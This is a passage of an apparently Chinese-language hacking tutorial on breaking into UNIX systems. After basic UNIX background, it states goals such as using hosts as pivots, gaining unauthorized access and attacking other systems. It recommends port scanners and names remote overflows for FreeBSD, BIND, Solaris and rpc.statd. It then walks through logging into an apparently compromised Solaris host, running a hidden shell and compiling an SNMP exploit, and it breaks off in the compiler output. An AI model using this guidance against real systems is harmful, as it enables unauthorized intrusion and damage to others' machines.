如何入侵UNIXNIX操作系统(尤尼斯)，是一个强大的多用户、多任务操作系统，支持多种处理器架构，按照操作系统的分类，属于分时操作系统，最早由KenThompson、DennisRitchie和DouglasMcIlroy于1969年在AT&T的贝尔实验室开发。目前它的商标权由国际开放标准组织所拥有，只有符合单一UNIX规范的UNIX系统才能使用UNIX这个名称，否则只能称为类UNIX(UNIX-like)。一：基本知识1：常见UNIX版本：SCOUNIX,Sunos,Solaris,HP-UX,Digtal,Unix,IRIX,AIX,Linux,FreeBSD,386BSD,A/UX,BSD,BSD-LITE,Goherent,Dynix,Hurd(GNN),InTeractive,Mach,Minix,MksToolkit,NetNSD,OSF/I,SystemVUnix,Unicos,Unixware...2:简单介绍几个sunos&solarisSUN本来想用solaris取代sunos，不过在用户的要求下，到目前为止，还是维持两者并存的政策;Freebsd是著名的BSD-UNIX的一的继承者，是UNIX众多分支中相当稳定的一个，很多ISP均使用运行Freebsd;Linux是一个面对PC机个人用户的自由廉价的UNIX产品(其硬件平台是Intel系列的CPU)，实际上众多的网络管理员真正使用的是Linux。3：UNIX操作系统的特点(1)多用户和多任务;(2)可移植性;(3)树行结构的文件系统;(4)I/O重定向技术和管道技术;(5)丰富的实用程序;(6)每个用户都有电子邮件。4：尤为突出的优点(1)稳定可靠性高;(2)网络功能强;(3)开发性好;(4)强大的数据库支持功能;(5)伸缩性强。二：入侵目的1：学习UNIX，熟悉内部操作，整体配置...2：做跳板或以此捕捉更多UNIX肉鸡;3：越权得到某些正常请求下得不到的东西;4：攻击破坏或以此作为利器来破坏其他系统;5：更多......三：入侵方法1：寻找目标工具：supperscan，流光，LANguardNetworkScanner2.0或者其他，凭个人喜好选用supperscan：扫描23，79端口，注意含%，#，&...主机，这些就是UNIX;LANguard..作简单设置，即可开始，判断对方操作系统功能乃同类软件中的精品，直观准确;流光：利用高级扫描，选telnet，PRC，POP3，FTP，Finger即可。其他方法一样...(说明：很多管理员为了迷惑入侵者往往故意更改telnet登陆时出现的信息，请注意识别)2：开始入侵(1)溢出(所有关于UNIX的溢出，都需要在一个UNIX/Linux的环境下进行编译)A：远程溢出溢出?呵呵，太多了!随便说几个：freebsd远程溢出，bind远程溢出，SunSolaris5.7/5.8Sparc远程溢出，redhat6.xrpcstatus远程溢出...自己去一一了解吧，在这里我简单说两个例子：a1：考虑到很多朋友使用windows，所以大家可以参看我的兄弟---蓝骑士的大作《freebsd溢出完全图文版》(地址：http://www.itser.com/ez/.bbs/topic.cgi?forum=7&topic=25&show=)，因为这个溢出程序有已经编译好了可以直接在windows下使用;a2:SunSolaris5.7Sparc远程溢出搜索...终于让我找到了一台sunos5.7，上我一台sunos5.8telnet66.*.146.48----->>这是我的!SunOS5.8login:plyPassword:Lastlogin:TueApr2303:55:09from39448.ddn.xaonliSunMicrosystemsInc.SunOS5.8GenericFebruary2000$tmp/.sh----->>当时溢出时做的处理!#lsbindataetcinitrdmntprocsbinusrbootdevhomelibmiscoptroottmpvarxfnskip#cat>snmp.c.......----->>太长了，省略...自己去找!#gcc-osnmpsnmp.c----->>用gcc编译snmp.c:Infunction`main':snmp.c:181:warning:passingarg3ofpointertofunctionfromincompatiblepointertypesnmp.c:181:warning:passingarg4ofpointertofunctionfromincompatiblepointertypesnmp.c:181:warning:pa